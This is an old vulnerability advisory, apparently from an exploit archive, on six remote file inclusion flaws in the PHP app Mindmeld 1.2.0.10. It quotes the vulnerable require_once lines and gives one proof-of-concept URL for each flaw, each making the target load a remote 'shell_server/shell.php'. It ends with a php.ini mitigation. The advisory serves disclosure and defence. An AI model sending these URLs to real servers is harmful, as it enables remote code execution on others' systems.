mindmeld-rfi.txt

mindmeld-rfi.txt: Posted Feb 1, 2008; Authored by David Wharton; Mindmeld version 1.2.0.10 suffers from multiple remote file inclusion vulnerabilities.; tags | exploit, remote, vulnerability, code execution, file inclusion; SHA-256 | cb08573d54c2a39d2112ffb4c3706e94eaed0a4ceec242a4422c1f01b3975986; Download | Favorite | View

mindmeld-rfi.txt

Summary

Mindmeld is an, "enterprise-capable knowledge-sharing system" written  
in PHP.  There are multiple remote file inclusion vulnerabilities in  
Mindmeld version 1.2.0.10 (latest version).

Details

1. Vulnerable File and Line:

Mindmeld-1.2.0.10/acweb/admin_index.php: line 51
  require_once ( $MM_GLOBALS['home']."include/utilities.inc" );

PoC:

http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell 
_server/shell.php?

---
2. Vulnerable file and line:

Mindmeld-1.2.0.10/include/ask.inc.php: line 34
  require_once ( $MM_GLOBALS['home'] . "interfaces  
{$MM_GLOBALS['interface']}/include/" .  
"interface_{$MM_GLOBALS['interface']}_ask.inc" );

PoC:

http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http:// 
shell_server/shell.php?php?

---
3. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/learn.inc.php: line 38
  require_once ( $MM_GLOBALS['home'] . "interfaces/ 
{$MM_GLOBALS['interface']}/include/"

PoC:

http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell 
_server/shell.php?

---
4. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/manage.inc.php: line 31
  require_once ( $MM_GLOBALS['home'] . "interfaces/ 
{$MM_GLOBALS['interface']}/include/"

PoC:

http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell 
_server/shell.php?

---
5. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/mind.inc.php: line 33
  require_once( $MM_GLOBALS['home'] . 'include/utilities.inc' );

PoC:

http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell 
_server/shell.php?

---
6. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/sensory.inc.php: line 70
  require_once ( $MM_GLOBALS['home'] . "include/utilities.inc" );

PoC:

http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell 
_server/shell.php?

---
It appears that these vulnerabilities are not vulnerable to local file  
includes.

These vulnerabilities have been disclosed to the vendor although  
development on this software has stopped.

Sources:

http://mindmeld.sourceforge.net/

Quick Fix:

In php.ini, disable the following variables: register_globals,  
allow_url_fopen, and allow_url_include.

Credit:

David Wharton

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

mindmeld-rfi.txt

mindmeld-rfi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

mindmeld-rfi.txt

Share This

mindmeld-rfi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems